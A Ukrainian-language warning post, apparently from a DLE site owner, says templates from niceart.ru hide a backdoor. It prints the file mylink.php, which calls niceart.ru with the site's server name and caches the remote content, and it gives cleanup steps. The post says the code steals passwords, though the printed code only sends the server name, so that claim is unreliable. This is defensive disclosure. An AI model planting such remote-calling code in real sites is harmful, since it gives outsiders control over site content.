Увага! Якщо ви вебмайстер і будуєте сайт на двигуні DLE, то ніколи не завантажуйте шаблони, файли чи взагалі будь-що із сайту
niceart.ru! Адже вони підступним чином крадуть ваші паролі.
Якщо ви помітили, то останнім часом на нашому сайті нагорі з'являлися дивні написи, пов'язані з якимись системними помилками. Коли ми почали пошук проблеми, то зовсім випадково наштовхнулися на деякі незвичайні файли у двигуні нашого сайту. У їхньому коді містилися команди пошуку та передачі усіх паролів на сайт niceart.ru. Будьте певні, такі хакерські коди є у кожному файлі з цього сайту! Ось іще одне
свідчення.
Для програмістів, кому це цікаво, надаємо код хакерського файлу mylink.php, який постійно знаходився у папці engine/modules:
<?php
$name="engine/cache/system/site_links.txt";
if(!is_file($name) || filemtime($name)<time()-432000)
//691200
{
$file_url = "http://niceart.ru/getlink/006/db.php?script_id=" . urlencode($_SERVER['SERVER_NAME']);
$mylink = @file_get_contents($file_url);
if($mylink)
{
$file = fopen($name, "w");
fwrite( $file, $mylink);
fclose( $file );
// chmod ( $file, 0777); //права
}
}
else
$mylink = file_get_contents($name);
?>
Якщо у вас стоїть двигун DLE, то перевірте у себе наявність цього файлу! Також у кореневому каталозі у файлі /index.php потрібно видалити ось цей рядок, якщо він існує:
require_once ROOT_DIR.'/engine/modules/mylink.php';
У папці /engine/cache/system подивіться, чи немає часом файлів на зразок my_site, my_links абощо. У них може міститися крадена інформація з вашого сайту. Подивіться, яка саме інформація була вкрадена, витріть ці файли і негайно змініть усі паролі, які були вкрадені. Найперше змініть пароль адмінпанелі сайту, бажано також FTP та MySql, якщо можливо. Інакше сторонні люди можуть мати несанкціонований доступ до вашого сайту.
